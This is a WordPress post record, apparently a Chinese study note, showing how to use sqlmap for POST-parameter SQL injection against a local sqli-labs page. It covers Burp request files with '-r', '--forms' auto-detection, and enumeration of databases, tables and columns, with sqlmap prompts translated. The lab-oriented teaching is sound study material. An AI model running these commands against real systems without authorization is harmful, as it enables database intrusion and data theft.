{"id":220,"date":"2025-01-17T22:58:07","date_gmt":"2025-01-17T14:58:07","guid":{"rendered":"http:\/\/gzxingyu.cloud\/?p=220"},"modified":"2025-01-17T22:58:08","modified_gmt":"2025-01-17T14:58:08","slug":"06-2sql%e6%b3%a8%e5%85%a5%e4%b9%8bsqlmap%e4%bd%bf%e7%94%a8post%e6%b3%a8%e5%85%a5","status":"publish","type":"post","link":"http:\/\/gzxingyu.cloud\/index.php\/2025\/01\/17\/06-2sql%e6%b3%a8%e5%85%a5%e4%b9%8bsqlmap%e4%bd%bf%e7%94%a8post%e6%b3%a8%e5%85%a5\/","title":{"rendered":"06.2SQL\u6ce8\u5165\u4e4bsqlmap\u4f7f\u7528(post\u6ce8\u5165)"},"content":{"rendered":"<h1>SQL\u6ce8\u5165\u4e4bsqlmap\u4f7f\u7528(post\u6ce8\u5165)<\/h1>\n<p>POST\u578b\uff1a\u4e0e\u6570\u636e\u5e93\u4ea4\u4e92\u662f\u901a\u8fc7post\u6570\u636e\u8fdb\u884c\uff0cURL\u4e0d\u53ef\u89c1<\/p>\n<h3>\u5229\u7528sqlmap\u8fdb\u884cPOST\u6ce8\u5165\uff0c\u5e38\u89c1\u7684\u6709\u4e09\u79cd\u65b9\u6cd5:<\/h3>\n<h2>\u6ce8\u5165\u65b9\u5f0f\u4e00\uff1a<\/h2>\n<p><strong>1.\u7528Burp\u6293\u5305\uff0c\u7136\u540e\u4fdd\u5b58\u6293\u53d6\u5230\u7684\u5185\u5bb9\u3002\uff08\u968f\u4fbf\u8f93\u5165\uff09\u4f8b\u5982\uff1a\u4fdd\u5b58\u4e3a1.txt,\u7136\u540e\u628a\u5b83\u653e\u81f3\u67d0\u4e2a\u76ee\u5f55\u4e0b<\/strong><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241103193746.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241103193746.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"Pasted image 20241103193746.png\"><\/div><br \/>\n<img decoding=\"async\" src=\"https:\/\/fynotefile.oss-cn-zhangjiakou.aliyuncs.com\/fynote\/4348\/1651663711000\/4acf54c747204860a73fe74a42a8c8c2.png\" alt=\"image.png\"><\/p>\n<p><strong>2.\u5217\u6570\u636e\u5e93:<\/strong><\/p>\n<p>sqlmap -r D:\\cc.txt  &#8211;dbs<\/p>\n<p>\u4e5f\u53ef\u4ee5\u4f7f\u7528  *  \u6307\u5b9a\u9700\u8981\u6d4b\u8bd5\u7684\u53c2\u6570<br \/>\n<img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241103193857.png\" alt=\"Pasted image 20241103193857.png\"><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241103194017.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241103194017.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"Pasted image 20241103194017.png\"><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241103194031.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241103194031.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"Pasted image 20241103194031.png\"><\/div><br \/>\n<strong>it looks like the back-end DBMS is &#8216;MySQL&#8217;. Do you want to skip test payloads specific for other DBMSes? [Y\/n]<\/strong><br \/>\n\u5b83\u770b\u8d77\u6765\u50cf\u540e\u7aefDBMS\u662f&#8217;MySQL&#8217;\u3002 \u662f\u5426\u8981\u8df3\u8fc7\u7279\u5b9a\u4e8e\u5176\u4ed6DBMS\u7684\u6d4b\u8bd5\u8d1f\u8f7d\uff1f [Y\/n]  \u8f93\u5165&quot;Y&quot;<\/p>\n<p><strong>for the remaining tests, do you want to include all tests for &#8216;MySQL&#8217; extending provided level (1) and risk (1) values? [Y\/n]<\/strong><br \/>\n\u5bf9\u4e8e\u5269\u4f59\u7684\u6d4b\u8bd5\uff0c\u60a8\u60f3\u8981\u5305\u62ec\u6240\u6709\u9488\u5bf9\u201cMySQL\u201d\u6269\u5c55\u63d0\u4f9b\u7684\u7ea7\u522b\uff081\uff09\u548c\u98ce\u9669\uff081\uff09\u503c\u7684\u6d4b\u8bd5\u5417\uff1f [Y\/n] \u8f93\u5165&quot;N&quot;<\/p>\n<p><strong>POST parameter &#8216;n&#8217; is vulnerable. Do you want to keep testing the others (if any)? [y\/N]<\/strong><br \/>\nPOST\u53c2\u6570&#8217;n&#8217;\u662f\u8106\u5f31\u7684\u3002 \u4f60\u60f3\u7ee7\u7eed\u6d4b\u8bd5\u5176\u4ed6\u4eba\uff08\u5982\u679c\u6709\u7684\u8bdd\uff09\u5417\uff1f[y\/N]  \u8f93\u5165&quot;Y&quot;<\/p>\n<h3>3.\u67e5\u8868<\/h3>\n<p>\u9009\u62e9\u4e00\u4e2a\u6570\u636e\u5e93\uff0c\u6bd4\u5982\u9009test<\/p>\n<p>sqlmap -r D:\\cc.txt  -D mamba &#8211;tables<br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241103194322.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241103194322.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"Pasted image 20241103194322.png\"><\/div><br \/>\n<img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241103194338.png\" alt=\"Pasted image 20241103194338.png\"><\/p>\n<h3>4.\u67e5\u5217<\/h3>\n<p>sqlmap -r D:\\cc.txt  -D mamba -T user &#8211;columns<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241103195731.png\" alt=\"Pasted image 20241103195731.png\"><\/p>\n<h2>\u6ce8\u5165\u65b9\u5f0f\u4e8c\uff1a\u81ea\u52a8\u641c\u7d22\u8868\u5355\u7684\u65b9\u5f0f<\/h2>\n<p>sqlmap.py  -u &quot;http:\/\/localhost\/sqli-labs-master\/Less-11\/index.php&quot; &#8211;forms<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/fynotefile.oss-cn-zhangjiakou.aliyuncs.com\/fynote\/4348\/1651663711000\/d1b1a089b2824e80a36551e501cfbe64.png\" alt=\"image.png\"><\/p>\n<p>do you want to test this form? [Y\/n\/q]<br \/>\n\u8981\u6d4b\u8bd5\u6b64\u8868\u5355\u5417?[Y\/n\/q]  \u8f93\u5165&quot;Y&quot;<\/p>\n<p>do you want to fill blank fields with random values? [Y\/n]<br \/>\n\u662f\u5426\u8981\u586b\u5145\u5e26\u6709\u968f\u673a\u503c\u7684\u7a7a\u767d\u5b57\u6bb5? [Y\/n]  \u8f93\u5165&quot;Y&quot;<\/p>\n<p>it looks like the back-end DBMS is &#8216;MySQL&#8217;. Do you want to skip test payloads specific for other DBMSes? [Y\/n]<br \/>\n\u5b83\u770b\u8d77\u6765\u50cf\u540e\u7aefDBMS\u662f&#8217;MySQL&#8217;\u3002 \u662f\u5426\u8981\u8df3\u8fc7\u7279\u5b9a\u4e8e\u5176\u4ed6DBMS\u7684\u6d4b\u8bd5\u8d1f\u8f7d\uff1f [Y\/n] \u8f93\u5165&quot;Y&quot;<\/p>\n<p>for the remaining tests, do you want to include all tests for &#8216;MySQL&#8217; extending provided level (1) and risk (1) values? [Y\/n]<br \/>\n\u5bf9\u4e8e\u5269\u4f59\u7684\u6d4b\u8bd5\uff0c\u60a8\u60f3\u8981\u5305\u62ec\u6240\u6709\u9488\u5bf9\u201cMySQL\u201d\u6269\u5c55\u63d0\u4f9b\u7684\u7ea7\u522b\uff081\uff09\u548c\u98ce\u9669\uff081\uff09\u503c\u7684\u6d4b\u8bd5\u5417\uff1f[Y\/n]  \u8f93\u5165&quot;N&quot;<\/p>\n<p>POST parameter &#8216;n&#8217; is vulnerable. Do you want to keep testing the others (if any)? [y\/N]<br \/>\nPOST\u53c2\u6570&#8217;n&#8217;\u662f\u8106\u5f31\u7684\u3002 \u4f60\u60f3\u7ee7\u7eed\u6d4b\u8bd5\u5176\u4ed6\u4eba\uff08\u5982\u679c\u6709\u7684\u8bdd\uff09\u5417\uff1f[y\/N]  \u8f93\u5165&quot;N&quot;<\/p>\n<p>do you want to exploit this SQL injection? [Y\/n]<br \/>\n\u4f60\u60f3\u5229\u7528SQL\u6ce8\u5165\uff1f \u8f93\u5165&quot;Y&quot;<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241103191941.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241103191941.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"Pasted image 20241103191941.png\"><\/div><br \/>\n<img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241103192007.png\" alt=\"Pasted image 20241103192007.png\"><\/p>\n<p>\u9047\u5230\u6709\u8f93\u5165\u6846\uff08post\u8bf7\u6c42\uff09\u65f6\u53ef\u4ee5\u7528bp\u6293\u5305<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/01\/Pasted-image-20241103193444.png\" alt=\"Pasted image 20241103193444.png\"><\/p>\n<p>\u5e38\u7528\u547d\u4ee4\uff1a<\/p>\n<pre><code>-r\u8868\u793a\u52a0\u8f7d\u4e00\u4e2a\u6587\u4ef6\uff0c-p\u6307\u5b9a\u53c2\u6570\n--current-db \u5f53\u524d\u6570\u636e\u5e93\n--forms \u81ea\u52a8\u68c0\u6d4b\u8868\u5355\n-data   \n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>SQL\u6ce8\u5165\u4e4bsqlmap\u4f7f\u7528(post\u6ce8\u5165) POST\u578b\uff1a\u4e0e\u6570\u636e\u5e93\u4ea4\u4e92\u662f\u901a\u8fc7post\u6570\u636e\u8fdb\u884c\uff0cURL\u4e0d\u53ef\u89c1 \u5229 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5,4],"tags":[],"class_list":["post-220","post","type-post","status-publish","format-standard","hentry","category-sql","category-web"],"_links":{"self":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/220","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/comments?post=220"}],"version-history":[{"count":1,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/220\/revisions"}],"predecessor-version":[{"id":221,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/220\/revisions\/221"}],"wp:attachment":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/media?parent=220"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/categories?post=220"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/tags?post=220"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}